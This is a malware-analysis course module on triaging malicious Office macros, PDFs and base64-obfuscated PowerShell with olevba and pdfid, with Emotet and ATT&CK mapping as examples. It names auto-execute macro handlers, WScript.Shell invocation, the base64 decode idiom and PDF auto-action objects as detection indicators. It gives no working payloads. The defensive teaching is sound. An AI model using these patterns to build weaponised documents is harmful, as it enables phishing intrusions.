Module 11 — Document & Script Malware¶
Type 6 · Reconstruct — extract embedded macros from a .doc with olevba, flag suspicious objects in a PDF with pdfid, and decode a base64 PowerShell payload, deliverable an IOC summary with ATT&CK tagging (T1566.001, T1059.001) for each artifact. (Secondary: Misconception Reveal — an olevba score is triage priority, not a verdict.) Go to the hands-on lab →
Last reviewed: 2026-06
Malware Analysis — analyse the attack surface that reaches every inbox: weaponised Office files, PDFs, and obfuscated scripts.
In 60 seconds
Weaponised documents are a top initial-access vector not because the technique is clever but because
the delivery is legitimate — Outlook opens the .docx, Adobe opens the PDF, PowerShell runs the
script, and the malicious logic rides inside a trusted container. olevba, pdfid, and oletools
make triage tractable in minutes — but an olevba score is triage priority, not a verdict. The
whole maldoc chain (macro → Shell → base64 PowerShell) decodes without ever executing the file,
because base64 is encoding, not encryption.
Why this matters¶
Phishing with weaponised documents remains one of the top initial-access vectors year after year. The reason is not that the technique is sophisticated — it is that the delivery is legitimate. Outlook opens .docx files; Adobe opens PDFs; PowerShell runs scripts. The malicious logic rides inside a trusted container. An analyst who cannot triage a suspicious document is blocked at the most common entry point for enterprise intrusions. Tools like olevba, pdfid, and oletools make this triage tractable in minutes. Emotet is the textbook maldoc chain: it spread for years through phishing emails carrying a Word document with a malicious VBA macro (T1566.001) that, on open, launched an obfuscated PowerShell downloader (T1059.001) to pull the payload — the precise macro → Shell/CreateObject → base64-PowerShell sequence this module triages. (Emotet — MITRE ATT&CK S0367 documents the spearphishing-attachment delivery and the PowerShell stage.)
Objective¶
Extract and analyse the embedded macros from a synthetic .doc file using olevba, identify suspicious objects in a synthetic PDF using pdfid, and decode a base64-obfuscated PowerShell script — producing an IOC summary and ATT&CK tagging for each.
The core idea¶
The mental model
The malicious logic rides inside a trusted container, so triage is about finding the attack
surface inside it. Office files are compound formats (OLE2 for .doc/.xls; Open XML zip
archives for .docx/.xlsx) and macros live in the OLE stream as VBA p-code and source. olevba
extracts and decompresses the source and scores the high-risk bits — auto-execute handlers
(AutoOpen, Document_Open), shell invocations (Shell, CreateObject("WScript.Shell")), string
obfuscation, network access.
flowchart LR
D["phishing .doc"] --> A["VBA macro<br/>AutoOpen / Document_Open"]
A --> SH["Shell / CreateObject<br/>(WScript.Shell)"]
SH --> PS["base64 PowerShell<br/>downloader"]
PS --> PL["fetch + run payload"]
The gotcha
The olevba score is a triage priority, not a verdict. A score above the warning threshold means "look more carefully," not "this is malicious" — benign documents with legitimate macros score too, and treating the number as a label produces both false alarms and false clears. The verdict comes from reading what the macro actually does, not from the heuristic total.
PDFs are more structurally permissive. The format supports JavaScript, embedded files (including executable PE binaries), and URI launch actions — all within the PDF specification. pdfid counts the occurrences of high-risk PDF object types: /JS and /JavaScript flag embedded JavaScript; /OpenAction and /AA flag automatic execution triggers; /EmbeddedFile flags an embedded object. The presence of /JS + /OpenAction together is the most reliable signal of a malicious PDF — benign PDFs rarely need both. pdfid alone does not extract or execute the JavaScript; for that, you would use pdf-parser or peepdf.
Go deeper: PowerShell obfuscation and the triage workflow
Most phishing chains end in a PowerShell stage — Emotet's macro spawned an obfuscated command that
rebuilt its download URLs at runtime. The canonical idiom: a base64 blob, then
[System.Convert]::FromBase64String() + [System.Text.Encoding]::Unicode.GetString(). This is
encoding, not encryption — no key, so decoding is always possible once you find the blob.
FromBase64String is your entry point; the decoded string is your next IOC. Full workflow: hash →
olevba/pdfid to find the surface → extract the script → decode strings → identify the payload
URL/filename. None of it requires executing the document.
Learn (~2.5 hrs)¶
oletools and Office macro analysis - decalage2/oletools — olevba documentation — the canonical reference; read the "Indicators" and "Output format" sections (~25 min). - SANS ISC — "Maldoc Analysis with olevba" (diary) — a real-world walkthrough on a phishing document; shows the full triage flow (~20 min).
PDF analysis - pdfid documentation (Didier Stevens) — explains the keyword counts and what each flag means; read "pdfid" and the "Usage" section (~20 min). - MITRE ATT&CK T1566.001 — Phishing: Spearphishing Attachment — covers maldocs as an initial-access technique with real procedure examples (~15 min).
PowerShell obfuscation - MITRE ATT&CK T1059.001 — Command and Scripting Interpreter: PowerShell — includes obfuscation sub-techniques and detection opportunities (~15 min). - Emotet — MITRE ATT&CK S0367 — the canonical maldoc family: spearphishing attachment (T1566.001) → VBA macro → obfuscated PowerShell downloader (T1059.001). Read its delivery techniques to anchor the triage chain in this module on a real campaign (~15 min).
Key concepts¶
olevbaextracts VBA source and applies heuristic scoring — score is triage priority, not verdict.- Auto-execute handlers (
AutoOpen,Document_Open) plusShell/CreateObjectis the highest-risk pattern. /JS+/OpenActiontogether in a PDF is the primary maldoc signal;pdfidcounts both.- PowerShell base64 payloads always use
FromBase64Stringas the decode call — that string is your pivot. - Full document-malware triage never requires executing the document.
- ATT&CK: T1566.001 (phishing delivery), T1059.001 (PowerShell execution), T1027.010 (obfuscated macros).
- Real worked family: Emotet (maldoc downloader) — phishing Word doc → VBA macro → obfuscated base64 PowerShell downloader is the exact chain this module triages, attributed to a real high-volume campaign
AI acceleration¶
Paste extracted VBA or decoded PowerShell into a model and prompt: "Analyse this script. List any IOCs (URLs, IPs, file paths), identify the likely payload delivery mechanism, and map the behaviour to ATT&CK technique IDs." Effective for rapid triage of long macro scripts. Verify any extracted URL by checking it against VirusTotal before using it in reporting — do not browse to it.
AI caveat
A model triages long macro/PowerShell scripts fast and pulls IOCs well, but the extracted URL is a lead, not a confirmed indicator — verify it via VirusTotal, and never browse to it from your analysis host.
Check yourself
- Why is a weaponised document such a durable initial-access vector despite being unsophisticated?
- An olevba score is high. What does that license you to conclude, and what does it not?
- Why can a base64 PowerShell payload always be decoded statically, while a true encrypted blob cannot?
Comments
Sign in with GitHub to comment. Choose the type: Feedback (errors or suggestions on this page) · Hints (help for fellow learners — no spoilers) · General (anything else).